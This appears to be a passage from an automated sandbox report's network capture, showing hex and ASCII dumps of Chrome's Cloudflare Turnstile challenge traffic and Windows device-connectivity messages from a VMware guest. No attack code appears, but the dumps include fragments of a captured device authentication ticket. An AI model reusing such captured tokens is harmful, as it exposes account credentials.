                                                        Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: Q3AxB4d11kmvNGh5.2Context: df89e08bc649f84c<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdwZ+yiti/LQI9KB7teCrzEPEjqYUltyOVVt+EnzMaXB4h1QzlXkTrWqAcZ7WnlOVkh8clWrVkQdl+OE/r50gtkhXomFS8LbmEmZdub4Zc7eDe
                                                        2024-07-03 19:06:56 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 51 33 41 78 42 34 64 31 31 6b 6d 76 4e 47 68 35 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 66 38 39 65 30 38 62 63 36 34 39 66 38 34 63 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 56MS-CV: Q3AxB4d11kmvNGh5.3Context: df89e08bc649f84c
                                                        2024-07-03 19:06:56 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:06:56 UTC58INData Raw: 4d 53 2d 43 56 3a 20 46 31 50 70 58 2f 4b 51 67 6b 61 50 72 6a 67 74 6d 70 68 31 43 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: F1PpX/KQgkaPrjgtmph1CA.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.549768104.17.2.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:56 UTC804OUTGET /cdn-cgi/challenge-platform/h/g/pat/89d927bb0859422d/1720033614005/d8f6daa4d2e6b1fbc12647ee8c15bf2aca804b2a7df87a62cbd6f1b874522087/z2eJs3LKj-UAXpj HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:56 UTC143INHTTP/1.1 401 Unauthorized
                                                        Date: Wed, 03 Jul 2024 19:06:56 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        2024-07-03 19:06:56 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 32 50 62 61 70 4e 4c 6d 73 66 76 42 4a 6b 66 75 6a 42 57 5f 4b 73 71 41 53 79 70 39 2d 48 70 69 79 39 62 78 75 48 52 53 49 49 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g2PbapNLmsfvBJkfujBW_KsqASyp9-Hpiy9bxuHRSIIcAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                        2024-07-03 19:06:56 UTC1INData Raw: 4a
                                                        Data Ascii: J


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.549769104.17.2.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:57 UTC917OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 30605
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Content-type: application/x-www-form-urlencoded
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        CF-Challenge: 9126e412fd5a54e
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:57 UTC16384OUTData Raw: 76 5f 38 39 64 39 32 37 62 62 30 38 35 39 34 32 32 64 3d 2d 76 59 37 33 48 4d 36 73 4d 39 71 59 46 6f 39 46 39 73 37 6e 73 4d 71 47 4c 47 75 47 4a 37 68 67 4d 4c 47 44 4c 38 47 47 70 48 6c 59 47 2d 48 47 4a 59 47 58 47 50 37 6e 39 69 6e 78 47 65 37 32 39 4d 65 24 44 38 78 76 47 35 56 67 47 24 47 69 33 49 48 47 51 37 77 6b 4c 33 47 6a 63 67 47 49 2d 59 31 6e 47 6e 61 59 47 32 53 66 6a 6f 44 36 38 73 37 2d 25 32 62 76 76 38 56 32 71 61 67 47 6d 44 47 47 6d 52 47 77 39 4d 53 52 69 38 71 4d 4a 69 70 6c 34 47 48 66 75 52 6d 63 52 47 32 69 67 75 33 75 57 4a 63 50 6c 39 67 46 6d 71 59 4d 41 64 42 36 47 69 35 71 47 4d 42 39 54 68 4c 53 46 39 4c 59 4d 68 4c 58 38 64 59 43 6f 37 71 42 6c 70 79 76 51 31 54 4a 32 6b 4a 58 34 49 42 53 56 53 6f 6c 38 30 61 48 72 33 42
                                                        Data Ascii: v_89d927bb0859422d=-vY73HM6sM9qYFo9F9s7nsMqGLGuGJ7hgMLGDL8GGpHlYG-HGJYGXGP7n9inxGe729Me$D8xvG5VgG$Gi3IHGQ7wkL3GjcgGI-Y1nGnaYG2SfjoD68s7-%2bvv8V2qagGmDGGmRGw9MSRi8qMJipl4GHfuRmcRG2igu3uWJcPl9gFmqYMAdB6Gi5qGMB9ThLSF9LYMhLX8dYCo7qBlpyvQ1TJ2kJX4IBSVSol80aHr3B
                                                        2024-07-03 19:06:57 UTC14221OUTData Raw: 67 61 37 55 47 68 59 48 69 4d 52 50 24 59 45 43 6e 7a 77 70 77 54 34 68 57 33 67 24 70 71 35 50 71 47 46 47 69 67 4d 31 47 4d 47 69 47 4d 66 47 64 36 47 24 4d 6f 33 58 37 48 74 50 46 37 35 37 48 67 62 6d 47 4a 37 46 76 4d 48 4b 55 67 47 62 47 4f 47 6a 67 71 6c 4f 6b 47 2d 67 48 37 4d 64 70 68 67 71 6e 4d 33 47 55 70 77 6e 47 69 78 24 67 71 6f 67 24 47 36 71 71 47 48 36 51 68 71 77 38 45 70 70 46 70 69 24 4b 4d 68 67 73 77 62 4d 79 52 32 47 4d 57 6c 32 37 47 47 68 69 4d 39 47 71 47 4a 77 47 67 47 55 37 77 62 4d 68 73 4d 6e 71 6f 7a 35 47 66 61 46 59 4d 61 47 7a 47 32 39 4d 62 47 6c 6e 4d 47 4d 34 47 4a 38 4e 71 47 61 47 74 6c 4d 47 47 46 47 77 47 2d 6e 47 70 47 49 37 38 62 47 48 47 73 70 4d 6e 47 73 47 71 37 74 6a 47 63 67 7a 39 47 6d 4d 72 70 4d 67 4a 76
                                                        Data Ascii: ga7UGhYHiMRP$YECnzwpwT4hW3g$pq5PqGFGigM1GMGiGMfGd6G$Mo3X7HtPF757HgbmGJ7FvMHKUgGbGOGjgqlOkG-gH7MdphgqnM3GUpwnGix$gqog$G6qqGH6Qhqw8EppFpi$KMhgswbMyR2GMWl27GGhiM9GqGJwGgGU7wbMhsMnqoz5GfaFYMaGzG29MbGlnMGM4GJ8NqGaGtlMGGFGwG-nGpGI78bGHGspMnGsGq7tjGcgz9GmMrpMgJv
                                                        2024-07-03 19:06:57 UTC322INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:57 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 23440
                                                        Connection: close
                                                        cf-chl-gen: HxskmNqyK0+gVrgS1I5ZQn4XDNA4GYZ8wZn0LbVFVpV2vp8lowAx/E7sJnMuVf7K$nAADX3JO3LBPDdLKA2VZUg==
                                                        Server: cloudflare
                                                        CF-RAY: 89d927ddee530f89-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:57 UTC1047INData Raw: 72 62 4f 32 66 4a 61 62 65 4d 4f 59 74 59 31 2b 6e 71 61 46 6e 38 53 47 74 61 65 38 72 38 6d 72 77 4c 54 46 6f 73 6d 34 70 74 6a 45 70 39 62 51 74 39 36 39 30 61 32 73 75 4e 2b 6c 35 63 65 6a 6f 2b 33 61 70 61 2f 74 38 72 43 79 37 64 54 41 34 4f 62 30 7a 39 54 76 31 66 76 62 75 4d 76 54 2b 41 44 33 76 4c 6e 68 34 64 72 62 31 66 76 35 44 50 67 4b 7a 65 38 54 43 4f 2f 6f 47 41 76 56 36 52 7a 63 46 4f 37 35 44 41 50 66 47 66 7a 31 46 67 6b 65 43 52 77 6b 43 41 77 49 4d 67 54 38 41 75 7a 31 44 78 4c 78 41 77 34 74 4c 68 30 57 4e 2f 7a 36 4f 54 73 55 39 78 38 2f 41 6b 70 41 51 67 6c 4b 50 6b 41 4d 55 52 46 4b 54 41 39 47 53 42 59 73 4c 31 41 59 47 30 68 56 4b 6c 49 73 50 56 64 45 52 55 42 62 53 6a 4e 44 5a 32 39 4c 52 53 70 4f 53 53 39 45 54 6b 78 56 4d 58 56
                                                        Data Ascii: rbO2fJabeMOYtY1+nqaFn8SGtae8r8mrwLTFosm4ptjEp9bQt9690a2suN+l5cejo+3apa/t8rCy7dTA4Ob0z9Tv1fvbuMvT+AD3vLnh4drb1fv5DPgKze8TCO/oGAvV6RzcFO75DAPfGfz1FgkeCRwkCAwIMgT8Auz1DxLxAw4tLh0WN/z6OTsU9x8/AkpAQglKPkAMURFKTA9GSBYsL1AYG0hVKlIsPVdERUBbSjNDZ29LRSpOSS9ETkxVMXV
                                                        2024-07-03 19:06:57 UTC1369INData Raw: 6d 6f 38 36 51 74 4d 4f 56 30 73 71 58 77 63 53 71 70 4c 57 31 75 4d 2f 4c 72 63 4b 79 34 71 36 6c 30 4b 44 6d 71 70 36 73 36 4b 37 47 72 76 44 63 73 73 7a 7a 79 73 37 6d 74 38 53 36 75 2f 6a 5a 38 4e 58 79 41 50 6e 56 35 66 45 46 33 72 7a 42 43 66 73 48 43 4f 76 6f 37 4f 6a 38 42 66 37 70 43 51 76 34 46 41 30 4a 46 68 63 56 41 78 6b 62 49 52 67 64 47 79 45 4a 48 53 4d 70 46 79 51 6e 4c 53 51 77 41 68 4d 67 49 77 49 6b 44 51 73 72 46 77 63 74 51 43 30 69 48 50 78 43 45 50 77 32 53 44 6b 43 4a 68 38 5a 4b 77 59 69 44 30 41 6e 43 30 45 66 52 44 55 35 47 77 34 72 46 45 41 71 51 53 34 72 55 6d 4e 62 4a 52 70 53 52 79 73 39 54 46 63 6e 4c 30 49 70 53 69 35 6e 61 6c 64 56 57 6d 31 63 57 48 42 71 67 44 68 32 56 57 52 5a 51 7a 39 47 51 46 46 44 5a 6b 74 33 57 56
                                                        Data Ascii: mo86QtMOV0sqXwcSqpLW1uM/LrcKy4q6l0KDmqp6s6K7GrvDcsszzys7mt8S6u/jZ8NXyAPnV5fEF3rzBCfsHCOvo7Oj8Bf7pCQv4FA0JFhcVAxkbIRgdGyEJHSMpFyQnLSQwAhMgIwIkDQsrFwctQC0iHPxCEPw2SDkCJh8ZKwYiD0AnC0EfRDU5Gw4rFEAqQS4rUmNbJRpSRys9TFcnL0IpSi5naldVWm1cWHBqgDh2VWRZQz9GQFFDZkt3WV
                                                        2024-07-03 19:06:57 UTC1369INData Raw: 7a 39 69 56 6b 36 36 76 73 4e 54 65 30 75 47 72 6d 75 53 34 30 71 50 48 70 4e 2b 2f 71 2b 48 6d 6f 4d 50 4a 77 38 6a 72 38 75 37 57 39 36 72 77 32 65 76 77 39 62 66 54 36 39 44 67 2b 62 76 5a 78 73 38 46 33 76 55 46 32 4d 62 71 33 38 2f 6b 7a 51 72 70 33 77 58 56 36 4f 6b 50 32 39 62 31 31 77 6f 57 41 42 37 38 48 42 67 57 38 2f 55 4b 49 79 51 4f 41 41 54 73 41 51 34 62 38 51 50 6e 4e 77 77 58 4e 51 54 36 48 41 77 38 2f 44 6b 36 47 7a 56 42 51 69 41 78 52 79 67 58 53 79 55 48 4b 79 49 51 45 69 59 78 54 68 35 47 54 79 77 55 45 68 73 2b 54 6a 34 71 48 7a 4d 56 50 46 30 32 50 54 4a 6b 49 42 31 71 61 55 39 64 5a 6d 63 2b 59 6d 59 2f 4c 45 39 47 53 6b 64 36 5a 33 31 4a 53 48 67 2f 61 6c 4a 2f 4e 31 78 63 52 7a 74 62 65 32 78 47 57 6e 68 67 53 57 5a 6b 69 56 4f
                                                        Data Ascii: z9iVk66vsNTe0uGrmuS40qPHpN+/q+HmoMPJw8jr8u7W96rw2evw9bfT69Dg+bvZxs8F3vUF2Mbq38/kzQrp3wXV6OkP29b11woWAB78HBgW8/UKIyQOAATsAQ4b8QPnNwwXNQT6HAw8/Dk6GzVBQiAxRygXSyUHKyIQEiYxTh5GTywUEhs+Tj4qHzMVPF02PTJkIB1qaU9dZmc+YmY/LE9GSkd6Z31JSHg/alJ/N1xcRztbe2xGWnhgSWZkiVO
                                                        2024-07-03 19:06:57 UTC1369INData Raw: 36 6d 32 7a 4c 6d 67 30 61 2b 62 32 36 36 66 35 4d 6a 53 33 71 7a 59 76 61 69 6f 38 4d 37 6b 72 76 54 79 33 38 2b 34 30 66 75 30 35 64 34 41 39 37 37 38 35 4e 44 32 39 76 62 5a 2b 39 37 6c 41 74 62 6c 36 73 37 70 33 51 37 55 39 75 51 59 36 41 33 37 2b 4f 63 55 41 41 34 69 46 4e 33 39 39 52 58 75 39 67 45 54 48 43 76 65 44 77 4d 68 2f 42 49 67 44 68 49 6d 43 78 59 6f 4d 42 58 30 4c 42 41 65 4e 7a 67 79 4b 78 6f 7a 4f 51 63 63 41 68 38 65 4e 78 38 49 47 30 52 50 52 79 49 65 4c 42 52 53 49 55 56 48 4f 52 68 54 4e 79 6c 68 56 7a 4e 42 50 45 31 51 49 57 4e 53 57 43 49 2b 48 79 63 2b 53 43 68 67 59 30 59 79 62 6e 59 33 5a 58 4a 36 5a 6c 52 4b 64 32 6c 4d 55 49 46 43 54 7a 39 46 57 33 47 43 67 33 5a 6a 6a 49 64 36 61 30 32 52 55 6c 2b 4f 6a 33 4a 51 6b 35 65 4e
                                                        Data Ascii: 6m2zLmg0a+b266f5MjS3qzYvaio8M7krvTy38+40fu05d4A97785ND29vbZ+97lAtbl6s7p3Q7U9uQY6A37+OcUAA4iFN399RXu9gETHCveDwMh/BIgDhImCxYoMBX0LBAeNzgyKxozOQccAh8eNx8IG0RPRyIeLBRSIUVHORhTNylhVzNBPE1QIWNSWCI+Hyc+SChgY0YybnY3ZXJ6ZlRKd2lMUIFCTz9FW3GCg3ZjjId6a02RUl+Oj3JQk5eN
                                                        2024-07-03 19:06:57 UTC1369INData Raw: 75 36 73 4e 76 62 33 65 65 34 73 39 69 32 34 75 6d 6f 77 38 65 2f 38 63 79 78 78 74 54 4f 31 74 69 38 37 64 7a 63 75 4e 6e 55 39 2b 48 30 35 4f 58 64 32 75 51 48 37 66 30 45 42 65 6a 35 2f 41 76 74 44 74 55 54 47 64 41 57 38 67 73 4e 47 2b 77 64 34 64 67 66 48 69 50 6b 38 52 67 45 38 75 49 66 49 41 41 50 4a 65 63 76 38 4f 33 7a 37 66 63 32 39 6a 59 72 48 67 6b 4a 4e 43 6f 72 48 45 49 64 49 67 5a 48 4a 53 68 4a 49 6b 77 48 43 67 6c 53 42 45 51 39 44 6a 55 52 53 45 67 51 56 30 55 57 56 31 78 4c 51 45 30 72 4e 7a 35 6b 49 54 64 57 4d 6c 31 59 4a 47 64 43 54 6a 31 71 55 54 35 6f 4c 30 39 30 57 6a 49 31 64 6a 70 30 53 33 63 38 64 33 74 39 54 31 68 69 57 6f 4e 47 5a 57 64 4c 65 47 65 44 65 5a 4f 49 54 59 74 73 56 47 74 71 64 35 4a 37 66 59 68 66 64 6c 4e 67 68
                                                        Data Ascii: u6sNvb3ee4s9i24umow8e/8cyxxtTO1ti87dzcuNnU9+H05OXd2uQH7f0EBej5/AvtDtUTGdAW8gsNG+wd4dgfHiPk8RgE8uIfIAAPJecv8O3z7fc29jYrHgkJNCorHEIdIgZHJShJIkwHCglSBEQ9DjURSEgQV0UWV1xLQE0rNz5kITdWMl1YJGdCTj1qUT5oL090WjI1djp0S3c8d3t9T1hiWoNGZWdLeGeDeZOITYtsVGtqd5J7fYhfdlNgh
                                                        2024-07-03 19:06:57 UTC1369INData Raw: 56 79 65 50 6f 32 63 71 76 73 4d 6a 4f 35 72 4c 66 78 74 58 78 30 63 6e 76 2b 75 66 77 75 50 33 59 33 38 30 44 38 39 58 2b 34 75 66 6d 78 50 7a 72 41 77 6a 39 30 65 58 53 7a 65 30 51 32 41 66 6f 47 74 50 77 36 78 2f 37 38 78 54 36 2b 43 44 39 47 76 7a 69 41 65 49 4b 2b 41 58 36 35 7a 49 4c 2f 68 4c 30 44 2b 6b 34 38 51 73 5a 46 68 41 62 48 68 6f 67 4a 50 73 53 4f 43 51 6a 48 69 45 6e 47 53 4a 42 4d 42 34 71 4c 79 38 68 4b 6a 63 79 54 56 4a 51 51 31 51 61 53 55 38 2b 4d 55 45 32 5a 43 52 6a 4f 6d 67 6f 5a 79 70 42 53 7a 6c 51 51 7a 77 75 59 46 52 4d 52 6d 6c 53 65 58 74 6f 52 48 35 7a 53 54 64 42 58 6f 46 74 52 54 78 56 55 48 4f 44 53 49 46 63 67 6e 43 4d 58 6d 74 2f 6b 34 32 46 69 31 56 72 61 31 46 55 56 70 2b 4d 61 33 56 5a 6a 33 78 31 66 4a 32 41 70 57
                                                        Data Ascii: VyePo2cqvsMjO5rLfxtXx0cnv+ufwuP3Y380D89X+4ufmxPzrAwj90eXSze0Q2AfoGtPw6x/78xT6+CD9GvziAeIK+AX65zIL/hL0D+k48QsZFhAbHhogJPsSOCQjHiEnGSJBMB4qLy8hKjcyTVJQQ1QaSU8+MUE2ZCRjOmgoZypBSzlQQzwuYFRMRmlSeXtoRH5zSTdBXoFtRTxVUHODSIFcgnCMXmt/k42Fi1Vra1FUVp+Ma3VZj3x1fJ2ApW
                                                        2024-07-03 19:06:57 UTC1369INData Raw: 34 73 2f 6d 30 64 58 54 72 38 6e 53 31 38 6a 52 30 39 6e 6e 33 76 66 35 77 4e 62 30 2f 64 58 64 38 77 4c 48 79 51 45 44 33 2b 37 72 38 51 76 6c 45 77 6e 4f 47 4f 33 34 36 42 7a 38 2b 2f 30 55 39 66 33 77 34 41 55 46 43 66 30 5a 42 78 2f 6b 48 41 6f 6a 38 41 77 55 41 52 49 50 46 68 58 34 4b 78 67 76 47 68 34 63 39 78 49 62 49 42 45 61 48 43 49 77 4a 30 42 43 43 52 38 39 52 68 34 6d 50 45 6f 51 45 6b 6c 4c 4b 44 63 30 4f 6c 4d 75 57 31 45 58 59 44 5a 42 4d 57 51 37 51 79 46 63 50 6b 59 34 4b 56 78 4f 59 31 78 54 5a 53 31 43 55 46 5a 57 55 6c 64 58 57 54 56 56 63 31 4a 50 58 48 56 6c 64 58 42 6f 66 32 4e 62 61 6f 52 6e 5a 34 52 69 66 57 79 49 64 5a 47 41 64 6f 39 69 67 6f 70 35 56 6e 57 53 63 6e 2b 43 68 4a 71 55 64 35 42 67 68 6f 65 49 69 59 61 4e 69 34 32
                                                        Data Ascii: 4s/m0dXTr8nS18jR09nn3vf5wNb0/dXd8wLHyQED3+7r8QvlEwnOGO346Bz8+/0U9f3w4AUFCf0ZBx/kHAoj8AwUARIPFhX4KxgvGh4c9xIbIBEaHCIwJ0BCCR89Rh4mPEoQEklLKDc0OlMuW1EXYDZBMWQ7QyFcPkY4KVxOY1xTZS1CUFZWUldXWTVVc1JPXHVldXBof2NbaoRnZ4RifWyIdZGAdo9igop5VnWScn+ChJqUd5BghoeIiYaNi42
                                                        2024-07-03 19:06:57 UTC1369INData Raw: 75 66 59 31 38 6a 5a 30 39 72 63 37 39 76 67 30 4e 58 74 35 4e 54 5a 36 65 58 2b 33 65 7a 72 33 4f 48 73 37 67 63 4d 39 66 4c 50 35 66 58 32 30 77 6a 33 2b 2f 76 63 2f 41 45 58 45 41 59 45 47 2f 6b 49 43 4f 4d 4b 43 41 76 6d 36 42 6f 51 36 79 41 57 45 68 55 6b 47 68 63 5a 4c 42 4d 61 4e 44 51 71 4d 76 6f 34 51 79 51 6c 48 69 55 6d 4b 53 34 74 4c 41 67 6d 4d 44 41 4d 54 44 55 30 4e 53 6f 30 4f 44 6c 49 4f 44 30 74 4e 6a 31 42 56 30 4a 45 52 45 56 55 50 30 68 66 50 6b 35 4c 59 32 42 61 55 55 46 4b 55 56 51 77 53 6c 42 59 62 31 4a 61 58 55 31 34 58 32 41 38 55 6c 74 69 65 6b 46 70 61 47 6c 71 59 32 32 44 67 47 35 77 68 33 5a 73 64 57 57 49 62 33 6c 70 62 6f 5a 37 66 5a 42 34 66 31 79 51 67 49 52 31 6c 49 4f 4a 6e 34 71 48 69 36 4f 4f 6a 49 2b 51 62 5a 61 56
                                                        Data Ascii: ufY18jZ09rc79vg0NXt5NTZ6eX+3ezr3OHs7gcM9fLP5fX20wj3+/vc/AEXEAYEG/kICOMKCAvm6BoQ6yAWEhUkGhcZLBMaNDQqMvo4QyQlHiUmKS4tLAgmMDAMTDU0NSo0ODlIOD0tNj1BV0JEREVUP0hfPk5LY2BaUUFKUVQwSlBYb1JaXU14X2A8UltiekFpaGlqY22DgG5wh3ZsdWWIb3lpboZ7fZB4f1yQgIR1lIOJn4qHi6OOjI+QbZaV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.549770104.17.3.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:58 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:58 UTC375INHTTP/1.1 404 Not Found
                                                        Date: Wed, 03 Jul 2024 19:06:58 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 7
                                                        Connection: close
                                                        cf-chl-out: 1iHssQp0AWE2OCmwUtIp1A==$lhC7awhe3i0YGt5cGUyv9A==
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Server: cloudflare
                                                        CF-RAY: 89d927e3ba687d18-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:58 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                        Data Ascii: invalid


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        41192.168.2.54977140.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 76 49 44 71 65 64 4c 6b 76 55 32 77 72 57 69 4c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 38 30 39 30 30 34 34 39 30 62 65 33 36 35 61 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: vIDqedLkvU2wrWiL.1Context: 1809004490be365a
                                                        2024-07-03 19:07:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:07:09 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 76 49 44 71 65 64 4c 6b 76 55 32 77 72 57 69 4c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 38 30 39 30 30 34 34 39 30 62 65 33 36 35 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 77 5a 2b 79 69 74 69 2f 4c 51 49 39 4b 42 37 74 65 43 72 7a 45 50 45 6a 71 59 55 6c 74 79 4f 56 56 74 2b 45 6e 7a 4d 61 58 42 34 68 31 51 7a 6c 58 6b 54 72 57 71 41 63 5a 37 57 6e 6c 4f 56 6b 68 38 63 6c 57 72 56 6b 51 64 6c 2b 4f 45 2f 72 35 30 67 74 6b 68 58 6f 6d 46 53 38 4c 62 6d 45 6d 5a 64 75 62 34 5a 63 37 65 44 65
                                                        Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: vIDqedLkvU2wrWiL.2Context: 1809004490be365a<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdwZ+yiti/LQI9KB7teCrzEPEjqYUltyOVVt+EnzMaXB4h1QzlXkTrWqAcZ7WnlOVkh8clWrVkQdl+OE/r50gtkhXomFS8LbmEmZdub4Zc7eDe
                                                        2024-07-03 19:07:09 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 76 49 44 71 65 64 4c 6b 76 55 32 77 72 57 69 4c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 38 30 39 30 30 34 34 39 30 62 65 33 36 35 61 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 56MS-CV: vIDqedLkvU2wrWiL.3Context: 1809004490be365a
